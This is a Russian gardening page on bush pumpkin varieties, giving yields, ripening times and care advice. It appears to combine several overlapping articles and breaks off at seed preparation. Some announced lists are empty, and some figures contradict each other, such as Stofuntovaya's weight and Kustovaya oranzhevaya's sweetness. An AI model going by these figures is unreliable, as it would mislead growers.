3 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание популярных сортов кустовой тыквы их выращивание и урожайность

Тыква кустовая

Особенности кустовой тыквы

Кустовая тыква может полностью перевернуть представления садоводов о том, как должна и как может выглядеть это растение. Сегодня выбор сортов кустовых тыкв очень широк, и каждый садовод со своими личными предпочтениями, вкусами и взглядами может подобрать тот сорт, который будет отвечать его видению. В этой статье мы подробнее расскажем о том, чем же примечательны кустовые тыквы, а также какие на сегодняшний день существуют сорта.

Кустовая тыква отличается свойствами именно в период своего цветения, поэтому они очень востребованы среди садоводов. Также особенности во внешнем виде остаются и тогда, когда тыква начинает постепенно плодоносить. Кустик смотрится очень нарядно, сразу же бросается в глаза, поскольку он заметно отличается по внешнему виду от других тыкв. Стебли у растения прямостоячие, плети вовсе отсутствуют, в плоды привыкли формироваться у самого основания кустика, и в этом как раз и состоит специфика этого вида тыкв.

Есть несколько преимуществ, которые выгодно выделяют этот вид тыкв от всех остальных. К ним относятся такие показатели:

— садоводу не нужно тратить лишнее время на то, чтобы формировать куст тыквы

— тыквенные кустик очень компактный, занимает мало места

— густая листва защищает почву от высыхания, что также является несомненным преимуществом

— урожайность данного типа тыкв совершенно не уступает урожайности других сортов, что не может не радовать садоводов.

Конечно же, есть еще одно, но очень значимое преимущество кустовых тыкв, и о нем следует поговорить отдельно. Это – скороспелость плодов. Мы понимаем, что у каждого сорта свой срок созревания, но в среднем от всходов до момента, когда плоды можно собирать с грядок, проходит примерно 85-100 дней. При этом, все плоды отличаются тем, что имеют отличные вкусовые характеристики, а также отличаются невероятным ароматом. У большей части сортов мякоть имеет яркую оранжевую окраску, содержит в себе достаточно высокий процент каротина и других полезных элементов. Тыквы очень полезны для организма человека, они подходят даже тем, что придерживается строгих диет, и предпочитает употреблять низкокалорийные овощи. По этой причине тыквы, в частности кустовая разновидность обладают такой востребованностью и популярностью.

Конечно же, существует большое количество различных сортов кустовых тыкв. В рамках данной статьи мы охарактеризуем самые востребованные и популярные, которые могут вызвать интерес и у опытных садоводов, и у тех, кто только начинает свой путь и ищет новые сорта.

Тыква кустовая: самые популярные сорта и их характеристики

Как правило, опытные огородники не спешат высаживать тыквенные семена в открытый грунт, поскольку прекрасно понимают, что это теплолюбивое растение, поэтому почва должна максимально прогреться, чтобы семечки взошли. Пока почва прогревается, садоводы заняты тем, чтобы выбрать самые подходящие сорта тыкв, которые будут отвечать всех их требованиям и интересам. В данной части нашей статьи мы чуть подробнее проанализируем некоторые сорта, их преимущества перед всеми остальными и самые специфические особенности.

Обычно сорта подразделяются по нескольким самым основным признакам:

— сроки созревания плодов

— форма плодов и их средний размер

— вкус мякоти, ее толщина, возможности приготовления тех или иных блюд, исходя из уровня горечи плодов

— лежкость плодов и их возможная транспортабельность на дальние расстояния

— урожайность за сезон (в расчете, сколько килограммов тыкв можно собрать с одного квадратного метра участка, на котором они высеяны).

Улыбка – сорт кустовых тыкв, о котором садоводы откликаются исключительно положительно. Многие дачники выбирают именно сорт Улыбка, поскольку он крайне урожайный (более 250 центнеров тыкв с одного гектара фермерского участка), холодостойкий и скороспелый. С моменты высадки семян до момента, когда садовод может снять с участка спелую тыкву, проходит всего лишь 85 дней. Этот сорт отлично подходит в условиях короткого лета, когда погода неустойчива, могут вернуться резкие заморозки. Также примерно к концу лета на маленьких, практически карликовых кустиках поспевают порционные плоды. Вес одного плода может варьироваться от 800 до 1200 граммов.

Плоды круглые, шаровидные, чуть приплюснутые у оснований. Мякоть имеет яркий оранжевый оттенок, очень сладкая, в принципе не отличается сочностью, но из нее можно готовить большое количество блюд для всей семьи. Семечек внутри семян очень мало, сорт этот легко транспортировать на дальние расстояния, а также в целом в подходящих условиях эта тыква может храниться в течение двух месяцев, совершенно не теряя ни свои внешние качества, ни вкусовые характеристики.

Лечебная тыква также относится к кустовым сортам. Растение имеет столовое назначение, кора плодов очень легко режется, мякоть яркая, оранжевая, средней толщины. Особое внимание необходимо уделить вкусовым характеристикам, так как это очень сочная и хрустящая тыква, которая обладает нежным вкусом без яркой выраженной горчинки. Одна из особенностей тыкв состоит в том, что с одного гектара можно собрать более 42 тонн тыкв, которые могут храниться в течение продолжительного времени, и очень легко переносят транспортировку на дальние расстояния.

Но есть и недостаток сорта. Состоит он в том, что тыквы очень легко подвергаются нападкам со стороны вредителей, а также очень легко заболевают такими вирусными и грибковыми болезнями, как антракноз, мучнистая роса и гнилями (серая и белая гнили). Рекомендуется высаживать семена этого сорта в районах Средней полосы России, на Урале и в Сибири, где они отлично приживаются и дают такой обильный урожай.

Жемчужина – кустовая тыква, относящаяся к мускатной разновидности. Урожай очень богатый, а получить его можно через 90 дней после высадки семян в открытый грунт. Не представляет труда получить крупные тыквы, чей средний вес будет составлять примерно семь килограммов. Каждый куст может выпустить около шести побегов, на каждом остается по одной завязи. Длина плодов около полуметра. По мере того, как тыква спеет и хранится, ее вкус может становиться еще более притягательным и насыщенным. К тому же, в состав плодов входит огромное количество микроэлементов, макроэлементов, витаминов и минералов, которые очень полезны для организма человека. К ценным свойствам мякоти также можно отнести такие, как:

Сорт жемчужных тыкв также ценится и по причине того, что они могут давать невероятно высокий уровень урожайности – с одного гектара можно собрать более пятисот центнеров тыкв. Сорт устойчив к засушливому климату, а также отличается невероятно притягательным вкусом.

Кустовая оранжевая тыква может в подходящих условиях храниться практически до наступления новогодних праздников. Этот сорт можно высаживать в различных регионах нашей страны, он совершенно не боится резких перепадов температур, а также вполне лояльно относится к транспортировкам. Посадка, а также уход за данной тыквой совершенно стандартны, ничем не отличаются в процессе от посадкой и уходом за другими сортами, даже если они не относятся к кустовому виду тыкв.

Стоит умеренно поливать кустики, пропарывать их, чтобы они не зарастали в обилии сорной травы, а также рекомендуется рыхлить и мульчировать кустики, особенно территории междурядий. Мякоть и шкурка красивых оранжевых оттенков, сахаристость тыкв очень низкая, поэтому мякоть можно использовать для приготовления различных кулинарных блюд, а также для зимних заготовок и заморозок.

Стофунтовая тыква – среднеспелые плоды, яркой оранжевой расцветки. Средний вес одного плода обычно не достигает сорока килограммов, отсюда и явное несоответствие название сорта с его действительными характеристиками. Тем не менее, даже эти параметры не особо воздействуют на популярность сорта – она по-прежнему остается одной из самых популярных тыкв, которые сегодня можно встретить на приусадебных участках.

Плоды также не придерживаются одной формы, не бывают и одинаковой массы. Все внешние и весовые характеристики зависят исключительно от погодных условий, в которых произрастают тыквы, а также от того, в какой по уровню плодородности почве они произрастают. Мякоть стофунтовых тыкв очень сочная, поэтому ее можно использовать ля приготовления большого разнообразия блюд. Также сорт отлично развивается и плодоносит, если стоит умеренно теплый температурный режим.

Амазонка – тыквы, чье созревание не приходится долго ждать. В течение 90 дней они достигают полной зрелости, и можно наслаждаться отличными плодами. Мякоть у них очень сочная и хрустящая, отличается невероятной сладостью, о чем невозможно не упомянуть. Достоинства сорта также состоят в том, что тыквы имеют отличный внешний товарный вид, они очень вкусные, могут храниться в подходящем месте в течение очень продолжительного времени. К тому же, как мы уже указали, созревание тыкв наступает очень рано, что также несомненно относится к плюсам этого сорта.

Грибовская тыква – это один из самых старых кустовых сортов тыкв, которая по своей форме напоминает больше не тыкву, а кабачок. Плод продолговатый, к концу зауженный, масса его варьируется от трех до пяти килограммов, вес в основном зависит от того, в каких условиях произрастал этот сорт, и был ли внимателен сам садовод при выборе посевного материала и участка для высадки тыкв. У этого сорта, по мере его роста и развития, поспевания может изменяться окраска кожуры. Сначала она зеленая, а затем меняется на ярко оранжевую, сохраняя зеленые полоски. Мякоть очень плотная и вкусная, насыщенного оранжевого цвета.

Стоит отметить, что этот сорт имеет высокий уровень иммунитета, очень любит теплую атмосферу и погоду, вес плода может достигать в среднем четырех килограммов. Также в мякоти содержится достаточно большое количество питательных веществ, что не может не быть плюсом.

Руж Виф Детамп – эта тыква представляет собой достаточно экзотическую культуру, но выращивать на приусадебном участке не представляет особого труда. Сорт очень полюбился российским садоводам, и сегодня является чуть ли не самым популярным среди всех кустовых сортов тыкв. Ее достаточно просто выращивать, кустики получаются компактными. С одного куста можно собирать крупные плоды, вес одного в среднем достигает десяти килограммов. Несмотря на высокий уровень урожайности, садоводы подчеркивают, что вкусовые характеристики и ароматность плодов на среднем уровне.

Тыква кустовая: специфика ухода

В целом, данные тыквы не требует к себе какого-то особого внимания. Посадка и последующий уход – это вполне стандартные процедуры, которые по технике ничем не отличаются от процедур в отношении обычных плетистых тыкв. Единственное отличие, которое выделяют сами садоводы, а также селекционеры, состоит в том, что кустики следует формировать, и способы тут сильно отличаются. При выборе места стоит учитывать, что тыквы любят теплые и освещенные участки, а также не переносят ветер или сквозняки.

Почву периодически перед посадкой следует раскислять, добавлять в нее доломитовую пудру или мел. Чтобы повысить плодородность почв, под перекопку вносят некоторые компоненты, среди которых компост и перегной, минеральные удобрения. Тыквы могут высаживаться в открытый грунт семенами, а можно высаживать рассаду, которая всходит и формируется в течение 25 дней. При посадке и уходе за тыквами лучше всего также ориентироваться на погодные условия, так как тыква очень любит тепло и не стоит высаживать ее, если в прогнозе ожидаются возвратные заморозки.

Именно благодаря ответственному и внимательному отношению самого садовода можно добиться того, что тыквы будут давать качественный и вкусный урожай. Кустовым тыквам также следует предоставлять регулярный полив, но в целом, если случилась кратковременная засуха, то тыквы могут без особого ущерба для самих себя пережить. В целом стоит быть очень внимательным, кустики не формируются, но подвязываются и прищипываются. Так можно добиться того, что будущий урожай будет еще крупнее. Плоды хранятся в темном и прохладном месте, защищенном от влаги, иначе тыквы попросту потрескаются, и урожай будет утрачен.

В целом, тыквы – это очень популярные и значимые культуры. Они просты в выращивании, дают отличные плоды, даже в неблагоприятных условиях. В особой степени это касается как раз кустовых тыкв – они могут расти даже в тех регионах, где климат не отличается стабильностью и устойчивостью. В этом и состоит особенность и преимущество кустовых сортов на территории нашей страны, и по этой причине российские садоводы отдают им свое предпочтение. Лежкость тыкв дает им еще больше преимущества, из них можно готовить вкусные блюда для всей семьи – игру, рагу, каши, заготовки на зиму. Кустовая тыква даже замораживается. Во всех случаях она придает невероятный вкус и аромат блюдам. Стоит отметить, что, несмотря на отсутствие техники по выращиванию тыкв, их необходимо поливать и подкармливать в соответствии с графиком, а также следить за тем, чтобы на них не нападали опасные вредители и насекомые, которые, к тому же, являются разносчиками вирусных и грибковых заболеваний и бактерий.

Лучшие сорта тыквы кустовой для открытого грунта: описание, фото

Тыкву люди выращивают уже около 5 тыс. лет. Овощ это не только неприхотливый в уходе, но и очень вкусный и полезный. На дачных участках может выращиваться как плетущаяся тыква, так и кустовая. Последняя разновидность пользуется у дачников особой популярностью. Далее в статье и разберемся с тем, что представляет собой тыква кустовая. Сорта, фото, описание — все это можно будет найти в обзоре.

Какую выбрать?

Плоды у кустовой тыквы формируются у основания стебля. Размеры они имеют обычно не слишком большие. Еще одной особенностью сортов этой разновидности является то, что их плоды созревают довольно рано. Собирать урожай такой тыквы можно обычно уже на 80-110-й день после посадки. Позднеспелых кустовых сортов сегодня практически не существует. Стебли у тыквы этой разновидности прямостоячие. Поэтому под ними очень хорошо сохраняется влага.

Из ранних наибольшей популярностью у дачников пользуются такие сорта тыквы кустовой:

Грибовская кустовая 189.

Созревают плоды этих сортов на 80-90-й день после посадки. Из среднеспелых чаще всего дачники выращивают:

Эти сорта тыквы кустовой ценятся огородниками в том числе и за то, что урожай их можно собирать уже на 90-110-й день после посадки.

Какую тыкву выбрать дачникам Сибири и Урала

Плетистые тыквы могут давать большие урожаи. Но в уходе такие разновидности достаточно сложны. Владельцам загородных участков, к примеру, приходится прищипывать их, удалять лишние завязи. К тому же и подходят тыквы плетистые в основном лишь для очень больших участков. Именно поэтому многие дачники и предпочитает лучшие сорта кустовых. Тыквы для открытого грунта этой группы практически не занимают места на участке. Прищипывать их также нужно. Однако проводить эту процедуру в данном случае гораздо проще.

В общем и целом овощ это довольно-таки теплолюбивый. Представленные в списках выше сорта ценятся дачниками не только за хорошую урожайность и отличный вкус плодов, но и за устойчивость к холоду. Это на самом деле очень популярные кустовые тыквы. Сорта для Сибири и Урала (за исключением Амазонки и Медовой красотки) подходят практически так же хорошо, как и для юга России. Отличные урожаи от них можно получать даже в жестком, переменчивом климате.

Сорта тыквы кустовой: Улыбка

Ценятся плоды этой тыквы дачниками прежде всего за их высокие вкусовые качества. Выведена была тыква Улыбка не так давно — около 15 лет назад, специалистами ГНУ ВНИИСООК.

Толщина коры у плодов этого сорта не слишком большая. Цвет тыквы Улыбка имеют ярко-оранжевый. На коре у плодов можно видеть едва заметные белые полосы. Мякоть у тыкв этого сорта оранжевая, плотная. Вкус она имеет сладкий. Аромат у мякоти Улыбки не слишком выраженный, дынный. Созревают плоды сорта очень рано — примерно через три месяца после посадки.

Сам куст компактный, не слишком высокий. Листья у этого сорта довольно большие, светло-зеленые. Каждый куст Улыбки дает около шести толстых побегов длиной примерно в 1 метр.

Особенности ухода за тыквой Улыбка

Вырастить неплохой урожай этого сорта на дачном участке совершенно не сложно. Сажать тыкву Улыбка рекомендуется на хорошо освещенном солнцем месте. Семена этого сорта обычно заглубляют в землю на 5-7 см. К преимуществам этой тыквы, помимо всего прочего, относят и холодостойкость. Высаживать ее в открытый грунт можно уже в конце мая. Стандартная схема расположения растений этого сорта на грядках — 75х75 см.

Поливают тыкву Улыбка, как и большинство других сортов, по мере подсыхания почвы. Удобряют ее в летнее время обычно крапивным настоем.

Тыквы Акорн

Этот интересный сорт был выведен совсем недавно. За очень небольшие размеры плодов многие дачники называют его «желудевым». В продаже сегодня встречаются как плетистые, так и кустовые разновидности этого сорта. Цвет кожуры у тыквы Акорн бывает разным. Обычно на дачных участках можно видеть темно- или светло-зеленые тыквы этого сорта. Но иногда встречаются и белые разновидности.

Мякоть у этой тыквы очень сладкая, сочная и нежная, с кремовым привкусом. Цвет она имеет желто-оранжевый. Максимальный вес плодов сорта Акорн — 1.5 кг. Созревают они примерно на 85-й день после посадки.

Как ухаживают за тыквой Акорн

Сажают эту тыкву обычно по схеме 70х70 см. Удобрения под нее вносят чаще всего только при высеве. В Средней полосе России высаживают Акорн в мае-июне. Для того чтобы защитить ростки от заморозков, их стоит в первое время укрывать пленкой. Поливать эту тыкву желательно только теплой водой (не ниже +20 С).

Сорт Лель

Это очень ранняя тыква кустовая. Сорта (отзывы хорошие о них имеются в том числе и по этой причине) этой группы дают плоды обычно уже к середине лета. Урожай тыквы Лель можно собирать на 90-й день после посадки. Форму плоды этого сорта имеют среднесплюснутую. Ребра на тыквах сорта Лель заметны только у самого основания. Цвет у кожуры плодов этого сорта желто-оранжевый со светло-коричневыми полосами. Веса тыквы Лель могут достигать в 3-3.5 кг.

Уход за сортом

Выращивают эту тыкву в основном только крупные предприятия агропромышленного комплекса. Мякоть у плодов не слишком вкусная. Основную ценность у этого сорта представляют семена. Очень часто имеющееся в магазинах в продаже тыквенное масло сделано именно с их использованием.

Выращивать этот сорт относительно несложно. Плохие погодные условия слишком сильного негативного действия на него не оказывают. Устойчива тыква Лель и к болезням. Мучнистой росой, антракнозом и пероноспорозом эти растения, к примеру, практически никогда не заболевают.

Тыква Амазонка

Безусловным преимуществом этого сорта является компактность куста. Относится тыква Амазонка к группе среднеспелых. Собирать урожай с кустов этого сорта можно на 100-110-й день после посадки. Плоды Амазонки имеют плоскую форму и темно-оранжевую с белыми полосами кожуру. Выглядят они очень аккуратными. Вес плодов этого сорта обычно равен 1-2 кг.

Мякоть у тыквы Амазонка ярко-оранжевая сладкая, хрустящая. К преимуществам сорта, помимо всего прочего, относят и способность плодов долго храниться, повышенное содержание в них каротина и их транспортабельность. Кусты у тыквы Амазонка небольшие, стебли толстые, а листья имеют темно-зеленый цвет.

Особенности ухода за сортом

К группе холодостойких тыква Амазонка не относится. Поэтому выращивают в открытом грунте ее обычно только на Украине, в Беларуси и на юге России. Сажают семена этого сорта в этих регионах в апреле-мае. Рекомендуемая схема размещения растений Амазонки на грядке — 150х150 см.

Грибовская кустовая 189

Этот старейший сорт известен многим российским дачникам. Очень многие огородники интересуются тем, какие подходят сорта тыквы кустовой для Урала. Дачникам этого региона обязательно стоит обратить внимания на Грибовскую кустовую 189. Сорт это в отношении погодных условий очень неприхотливый.

Плоды у Грибовской кустовой тыквы большие — могут достигать веса в 2-2.5 кг. В некоторых случаях на кустах вырастают плоды массой и до 5 кг. Форму тыквы этого сорта имеют обратнояйцевидную, продолговатую. Окраска у плодов Грибовской кустовой темно-зеленая. По мере созревания цвет их коры меняется на светло-оранжевый.

Мякоть у плодов этого сорта очень плотная, оранжевая, сладкая. Собирают урожай этой тыквы уже на 80-й день после посадки. Плоды Грибовской можно использовать для приготовления очень вкусных блюд. Многие дачники считают, что этот сорт имеет самую вкусную мякоть.

Уход за Грибовской

Лучшие сорта кустовой тыквы обычно отличаются холодостойкостью. К группе именно таких разновидностей, как уже упоминалось, относится и Грибовская 189. Сорт этот может выращиваться в том числе и в Подмосковье, на Урале и в Сибири. К преимуществам Грибовской кустовой 189 многие дачники относят и то, что эта тыква очень устойчива к разного рода заболеваниям. Высаживать этот сорт в открытый грунт в средней полосе России положено в мае-июне. Рекомендованная схема расположения для него — 60х60 см.

Медовая красотка

Это также очень популярная тыква кустовая. Сорта (фото на странице это подтверждают) этой группы обычно имеют довольно-таки аккуратные плоды. К Медовой красотке это относится в полной мере. К плюсам плодов этого сорта также относят и их превосходные вкусовые качества.

Созревает тыква Медовая красотка примерно на 90-100-й день после посадки. Форму они имеют округлую с четко выраженными ребрами. Цвет у кожуры плодов этого сорта оранжевый. Собственно сама кора у Медовой красотки очень тонкая. Мякоть у плодов сочная, сладкая, хрустящая и ароматная. Вес тыкв этого сорта может достигать 4-6 кг.

Особенности ухода

Морозостойкостью сорт Медовая красотка не отличается. Подходит он для выращивания в основном в Краснодарском крае, на Ставрополье, на Украине, в Молдове. Высаживать в открытый грунт его рекомендуется в апреле-мае. Заглубляют семена Медовой красотки в зависимости от типа почвы на 2-5 см.

В уходе этот сорт неприхотлив, однако требует периодических подкормок. В первый раз удобрения вносят под растения в начале цветения. При этом используют обычно простую навозную жижу. Вторую подкормку делают через 10 дней. В грядки вносят азотистые удобрения или перегной. В дальнейшем тыквы подкармливают с интервалом в 7-10 дней. Во время завязи и созревания плодов используют в основном комплексные минеральные составы, не содержащие азота.

Сорт Лечебная

Основным плюсом этой крупноплодной тыквы является длительный срок хранения плодов. В прохладном месте они могут пролежать до мая. Веса плоды этого сорта достигают в 3-5 кг. Кожура их имеет светло-серый цвет. Помимо оттенка, отличить эту тыкву от других сортов можно и по характерным прерывистым полоскам на плодах. Мякоть у тыквы Лечебной вкусная, светло-оранжевая, хрустящая и сладкая. К преимуществам этого сорта многие дачники относят в том числе и повышенное содержание каротина в мякоти. Созревают тыквы на 100-105-й день после посадки.

Особенности возделывания

По морозостойкости сорта тыквы кустовой Улыбка и Грибовская Лечебную слегка превосходят. Выращивают эту тыкву чаще всего на юге. Однако при должном уходе получать хорошие урожаи сорта Лечебная можно и в средней полосе России, и на Урале, и даже в Сибири. Для этого нужно просто укрывать всходы весной пленкой.

Высаживать эту тыкву рекомендуется по схеме 80х80 см. Делать это желательно в мае-июне. Семена ее заглубляют в землю на 4-6 см. Уход за этим сортом осуществляется стандартный. Никаких особых рекомендаций для него не предусмотрено.

Сорт тыквы Кустовая оранжевая

Этот сорт, как и Лечебная, относится к группе крупноплодных. Веса плоды Кустовой оранжевой могут достигать до 5 кг. Собственно само же растение при этом отличается компактностью.

Несмотря на то что этот сорт относится к группе кустовых, во второй половине сезона он может образовывать не слишком длинные плети. Цвет кожуры у плодов этой тыквы очень яркий, оранжевый. Форму они имеют овальную, немного сплюснутую. Мякоть у Кустовой оранжевой желтая, сладкая. К преимуществам сорта многие дачники относят в том числе и лежкость его плодов.

Особенности посадки

Плюсом тыквы Кустовая оранжевая считается прежде всего то, что возделывать ее можно в том числе и в заслушливых регионах. К недостатку влаги этот сорт абсолютно не чувствителен. Также Кустовая оранжевая очень неплохо переносит разного рода неблагоприятные погодные условия. Высаживают эту тыкву по стандартной схеме 60х60 см или 70х70 см.

Вместо заключения

Таким образом, мы выяснили, какие существуют наиболее популярные огородной культуры тыква кустовая, сорта. Фото впечатляющих плодов этой группы представлены на странице. Вырастить такие же красивые аккуратные тыквы на своем участке под силу любому дачнику. К плюсам кустовых сортов относят в том числе и их неприхотливость. Однако ухаживать за этой культурой следует, конечно же, обязательно. В этом случае она порадует хозяев участка высокими урожаями и прекрасными вкусовыми качествами самих плодов.

Лучшие сорта кустовых тыкв

В отличие от плетистой кустовая тыква не распускает длинные побеги и не стелется по земле. Многие ее выращивают с целью экономии места. Некоторые этапы ухода, необходимые плетистым видам, опускают, что облегчает выращивание. Сорта такой тыквы характеризуются тем, что не нужно долго ждать ее урожая. Плоды преимущественно небольшие.

Лучшие сорта кустовых тыкв

Выбор сорта

Культивируя тыкву, нужно учитывать условия конкретного региона. От некоторых кустовых видов можно добиться высокого урожая даже в сложном и переменчивом климате.

Для Сибири

Если не подойти ответственно к выбору сорта, можно остаться неудовлетворенным результатом выращивания. Регион отличается суровыми условиями. Созреть тут могут такие популярные виды:

  • Веснушка – шаровидная, немного приплюснутая. Вес до 3 кг. Срок созревания ранний. Цвет кожуры зеленоватый с желтыми точками. Мякоть сочная, сладковатая, обладает фруктовым привкусом;
  • Адажио – плоды круглые, сильно приплюснутые, с углублением возле плодоножки. Средний вес – 3 кг. Срок созревания среднеранний. Мякоть обладает хорошим вкусом. Продукт применяют для производства диетического и детского питания.

Для Урала

Регион отличается продолжительными периодами заморозков. Для выращивания подойдет большинство сортов, кроме Амазонки и Медовой красотки. Среди них выделяют виды:

  • Дачная – холодостойкий сорт, отличается ранним сроком созревания. Вес плодов – до 4 кг. Кожура зеленая с желтыми полосками. Мякоть желтого цвета, вкусная. Обладает приятным запахом;
  • Кустовая золотая – вид с ранним сроком созревания. Плоды округлые, сплющенные. Масса – до 5 кг. Поверхность сегментирована. Кожура золотистая. Мякоть желтая, хрустящая, несладкая.

Для средней полосы России

Сорта кустовой тыквы для региона должны быть районированными, иначе плоды не успеют созреть. Для культивирования на территории средней полосы страны, в том числе Подмосковья, подходят следующие виды:

  • Мускатная – название объединяет виды, обладающие похожими характеристиками. Мякоть у них сладкая. Вырастить культуру можно только рассадным способом, т.к. для созревания ей требуется много времени;
  • Апорт – относится к самым вкусным сортам. Плоды округлой формы, чуть сплюснутые сверху и снизу. Поверхность почти гладкая. Имеет средние сроки созревания. Вес – до 7 кг. Мякоть сочная, хрустящая, отличается сладостью.

Обзор лучших сортов

Тыква кустовая полюбилась огородникам за полезный состав и отличные вкусовые качества. Среди множества видов некоторые получили особое признание.

Улыбка

Плоды могут храниться в свежем виде долгое время

Сорт выведен в России около 15 лет назад. Отлично адаптирован к сложным условиям климата. От массовых всходов до сбора плодов проходит до 3 месяцев.

Растение небольшое. Формирует 6 метровых побегов. Листья крупные, зеленые, узорчатые. Цветки желтые или оранжевые. Приятно пахнут.

Плоды отличают такие качества:

  • форма шаровидная, слегка приплюснутая;
  • вес – 1 кг;
  • кожура оранжевая, средней толщины, прочная, не разделена на сегменты, полосатая;
  • мякоть оранжевая, плотная, с запахом дыни;
  • вкус отличный.

На кусте бывает до 15 плодов. Женские цветки образуют боковые плети. Семенная камера маленькая. Семечки продолговатые, белые, гладкие.

Сорт Улыбка ценится за транспортабельность и устойчивость к морозам. Его выращивают на Урале и в Сибири. Урожайность – 3 кг с 1 кв. м. Занимает одно из лидирующих мест по диетическим характеристикам и содержанию витаминов. Поспевшая тыква сохраняет товарный вид до зимнего периода.

Акорн

Второе название – Желудевая. Выведена недавно. Один из самых ранних видов кустовых тыкв. Сбор урожая возможен спустя 80 дней после массовых всходов. Бывают и плетистые сорта Акорна.

Плоды отличаются такими характеристиками:

  • желудевидной формой – отсюда и второе название;
  • небольшим весом – 600-700 г;
  • толстой кожурой с желобками;
  • цветом корки от темно-зеленого до оранжево-пятнистого;
  • плотной, оранжево-желтой мякотью;
  • сладким вкусом.

Кустовую тыкву этого сорта используют для приготовления десертов. Из-за особой структуры ее легко фаршировать. Имеет хорошую лежкость. Кожуру нет необходимости удалять – она съедобная. Семечки вкусные. Часто твердокорые виды тыквы выращивают ради них.

Получен в результате скрещивания видов Миндальная 35 и Находка. Относят к ультраскороспелым – плоды созревают через 90-100 суток после всходов. Показатели урожайности – 25-40 т/га. Товарность – 93 %.

Плоды сорта, согласно описанию:

  • среднесплюснутые;
  • кожура преимущественно гладкая, около плодоножки имеет ребра;
  • цвет в несозревшем виде темно-зеленый, потом становится желто-оранжевым;
  • средний вес – 3,2 кг;
  • мякоть оранжевая, средней плотности, сочная;
  • дегустационная оценка – 4,2 балла.

Сорт Лель обладает иммунитетом к мучнистой росе и антракнозу. Устойчивость к пероноспорозу средняя. Применение преимущественно техническое. Подходит для зеленого конвейера. Блюда из тыквы не готовят.

Сорт Лель не подходит для употребления в пищу

Семена кремового оттенка. Выход – 0,4-0,6 т/га. Их используют для получения тыквенного масла, потому что семечки содержат до 50 % жиров. На его основе делают разные лекарства.

Амазонка

Куст компактный. Образует до 3 завязей. Длина основной плети – 1 м. Листья темно-зеленые, маленькие. Сорт скороспелый – урожай собирают через 80-85 дней после всходов.

Плоды отличают следующие качества:

  • по форме округло-сплющенные;
  • весят в среднем 1 кг;
  • кожура темно-оранжевая, полосатая;
  • мякоть оранжевая, сладкая, хрустящая.

Семена мелкие, бело-серые, шероховатые. Из плодов готовят соки, десерты, пюре. Блюда из тыквы являются одной из составляющих детского и диетического питания. Семенная камера большая. Семечек много. Плоды сохраняют товарный вид около 4 месяцев. Урожайность – 36-68 т/га.

Грибовская 189

Сорт выведен российскими селекционерами. Особенно популярен он в Сибири и на Урале. Созревание раннее – от всходов до сбора урожая проходит около 86-98 дней. Грибовская кустовая ценится за высокую отдачу плодов – до 39,8 т/га. Имеет устойчивость к гнили, слабо поражается мучнистой росой и бактериозом.

Растение мощное. На каждом кусте – по два плода, которые характеризуются таким описанием:

  • форма продолговатая, сужается к основанию;
  • масса – до 5 кг;
  • поверхность гладкая или слегка ребристая;
  • кожура тонкая, прочная, сначала темно-зеленая, потом оранжевая с зелеными полосами;
  • мякоть толстая, плотная, оранжевая, сладкая, приятная на вкус.

Гнездо для семян большое. Товарные качества высокие. Из тыквы Грибовской готовят разные блюда, ее консервируют.

Медовая красотка

Разновидность мускатных тыкв. Завезена с Китая. Созревание раннее – около 3 месяцев. Урожайность – до 50 т/га. Имеет относительную устойчивость к мучнистой росе.

Отличительные характеристики плодов следующие:

  • шарообразная форма;
  • оранжевые, часто с зелеными точками, с выделенными ребрами;
  • вес – 6 кг;
  • тонкая и прочная кожура;
  • оранжевая, хрустящая, ароматная и вкусная мякоть.

Созревшая тыква подлежит хранению. Из нее готовят каши, десерты, соки. Переносит сорт перевозки на длительные расстояния.

Лечебная

Эта тыква – результат работы кубанских ученых. Срок созревания ранний – до 105 дней. Урожайность – 3,7-4,2 кг/м². Применяют в столовых целях.

Тыква ценится за хороший вкус

Сила роста куста средняя. Плети короткие. Листовые пластины 5-угольные, сплошные.

  • округло-сплюнутые;
  • серого цвета;
  • разделены на небольшие сегменты;
  • весят 3-5 кг;
  • с тонкой кожурой;
  • с оранжевой, средней толщины, хрустящей мякотью;
  • вкусные.

Камера для семян средняя. Семечки овальные, белые, гладкие. Масса 100 штук – 27 г.

Сорт Лечебная поражается мучнистой росой, серой и белой гнилью, антракнозом. Тыква хорошо переносит холода. Выдерживает перевозку и может долго сохранять товарные качества.

Кустовая оранжевая

Тыква получена в результате работы кубанских селекционеров. Характеризуется средним сроком созревания – 100 суток.

Тыква Кустовая оранжевая характеризуется такими плодами:

  • шаровидными;
  • слаборебристыми;
  • с оранжевой и тонкой кожурой;
  • массой до 4,5 кг;
  • с оранжевой, сахаристой, сочной, хрустящей и сладкой мякотью.

Применение универсальное. Тыква подходит для приготовления салатов, десертов, консервации, запекания и зимнего хранения.

Жемчужина

Выращивают тыкву в открытом грунте в средней полосе России. Куст имеет 6 побегов. На каждом образовывается одна завязь. Срок созревания – примерно 100 дней. С 1 га собирают 50 т плодов, которые отличаются такими характеристиками:

  • цилиндрообразной формой;
  • длиной до 0,5 м;
  • весом до 7 кг;
  • кожурой оранжевого цвета с сизым налетом;
  • темно-оранжевой, плотной, хрустящей и сочной мякотью;
  • сладким вкусом.

Семена мелкие. Тыква хранится долго, но из-за тонкой кожуры могут возникать повреждения при перевозке.

Стофунтовая

Вес плода может достигать 20 кг

Вид среднепоздний – созревание наступает через 130 суток после появления всходов. Урожайность – 6,3 кг/м². Обладает иммунитетом к бактериозу, мучнистой росе, гнили.

  • шаровидные;
  • слабосегментированные;
  • большие – масса 10 кг, иногда и 20 кг – при соблюдении условий выращивания;
  • с тонкой, желто-оранжевой кожурой;
  • мякоть с рыхлой структурой, кремово-желтая, не очень сладкая, малоароматная.

Вид характеризуется кормовым назначением. Востребован в сельском хозяйстве.

Особенности выращивания в открытом грунте

Чтобы культура порадовала высокими показателями урожайности, необходимо соблюдать правила агротехники.

Посадка

Процесс предусматривает несколько этапов.

Подготовка участка

Тыква любит хорошо освещенные участки. Лучшие «предшественники» для нее – это бобовые, картофель, лук и капуста. Участок подготавливают с осени. Для этого под глубокую перекопку земли на 1 м² вносят такие вещества:

  • компост – 5 кг;
  • хлористый калий – 15 г;
  • суперфосфат – 30 г.

При повышенной кислотности почвы вносят также древесную золу или известь. Весной землю перекапывают снова, но уже неглубоко. Удобряют ее, внося по 20 г аммиачной селитры на 1 м².

Подготовка семян

